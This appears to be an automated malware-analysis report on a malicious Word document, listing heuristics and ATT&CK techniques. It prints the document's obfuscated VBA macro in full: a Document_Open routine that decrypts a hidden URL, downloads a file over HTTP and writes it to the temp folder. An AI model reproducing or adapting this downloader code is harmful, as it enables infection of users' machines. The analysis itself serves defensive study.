MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. A critical heuristic indicates that the VBA code downloads and executes a file from an HTTP URL. The Document_Open macro is present, and a CreateObject call is used, suggesting the execution of arbitrary code. The specific URL referenced by the macro, http://schemas.openxmlformats.org/drawingml/2006/main, is benign, but the heuristic strongly suggests a download and execute behavior, indicating a downloader or droppper functionality.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
UKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEIDSPQPRKNRZNMUPQMYNDCTNXSOUZRRLLYDJXHWJRXRQNWVHYEHFLTTEFKVMBJYCMPKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRB = PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15748 bytes |
SHA-256: 17cf29051822b23f8fba9b946384df799bca817e50281b0bf5098a61d259e52d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 75 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function CleanEncryptSTR(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL As String) As String
Dim NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP As String
NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP = "&0123456789;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
Dim OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN As String
Dim QUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUH As Boolean
OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN = "DFHSGFJHSHFBDFBDFGSDRBRHBESRBERGSERHRHESDRGRFDBSDRGEARGHERGHESRHERGESRGESRHEHRFGBHSRGHESDRHERHBDRFGBHSDFGESRGHEWSRGHSGBESRGHESRHAREGERGASGHESRHESRHESRHERGESRGSERGASGEARGAREGHEHEAHRSE"
QUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUH = False
Dim i As Integer
Dim KINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMG As Integer
Dim GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX As String
Dim QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR As Integer
Dim ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG As Integer
Dim VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY As String
If Len(OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN) > 0 Then
For i = 1 To Len(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL)
GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX = Mid(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL, i, 1)
QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR = InStr(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP, GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX)
If QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR > 0 Then
KINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMG = Asc(Mid(OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN, i Mod Len(OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN) + 1, 1))
If QUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUH Then
ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG = QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR + KINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMG
Else
ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG = QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR - KINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMG
End If
ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG = ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG Mod Len(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP)
If ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG <= 0 Then
ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG = ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG + Len(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP)
End If
VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY = VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY & Mid(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP, ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG, 1)
Else
VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY = VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY & GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX
End If
Next i
Else
VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY = TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL
End If
CleanEncryptSTR = VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY
End Function
Private Sub Document_Open()
Const TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL = 2
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
BBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVS = fso.GetSpecialFolder(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL)
Dim HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI
Set HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI = CreateObject("ADODB.STREAM")
TGUKJZUFZUCHYYSSGKQEOEPYFYXUECNFLNMRZBLMQDTIPGJSWRHFFEHZVZOCUDFGCODSKIDMIDKPHHZTHSYGWFXZNHGDMKVHSVTZCJTUYEBQXHRBXSJNNMPIEIWDDLNOKWEBSJKUJLSXIOICPBZOFNGIVIOLUSEPBXVBKRCVBMJYYPZCGBQVVUXJM = BBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVS + CleanEncryptSTR("\enVeeX.m2g")
Set PUMMGYMXELCKDFSMLIRPBMYBZFHOYZEJHVDMWGDXOSSRUNJNCJIQSTPCJGXOQZOQXDNUNHUGFTKSLNBNTQZXJUGDBGPWHBGROEFUFHLGWBBZDORVKQQYBCXKROGWXIWYGEVCPPDHNCLBNVJVCYIYKDILJOWFIJOZWMMDGPTOECCCEWZELYYHC = CreateObject("SHELL.APPLICATION")
Set PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID = CreateObject("MICROSOFT.XMLHTTP")
PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.Open "get", CleanEncryptSTR("n0Awy://&3pixi1lpArwu9.et.40//m0qw/oE0cJd78z4rGpSy.fDl"), False
OHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJP = 1
PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.send
UKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEIDSPQPRKNRZNMUPQMYNDCTNXSOUZRRLLYDJXHWJRXRQNWVHYEHFLTTEFKVMBJYCMPKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRB = PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.responseBody
If PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.Status = 200 Then
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Open
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Type = OHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJP
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Write UKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEIDSPQPRKNRZNMUPQMYNDCTNXSOUZRRLLYDJXHWJRXRQNWVHYEHFLTTEFKVMBJYCMPKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRB
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.SaveToFile TGUKJZUFZUCHYYSSGKQEOEPYFYXUECNFLNMRZBLMQDTIPGJSWRHFFEHZVZOCUDFGCODSKIDMIDKPHHZTHSYGWFXZNHGDMKVHSVTZCJTUYEBQXHRBXSJNNMPIEIWDDLNOKWEBSJKUJLSXIOICPBZOFNGIVIOLUSEPBXVBKRCVBMJYYPZCGBQVVUXJM, OHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJP + OHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJP
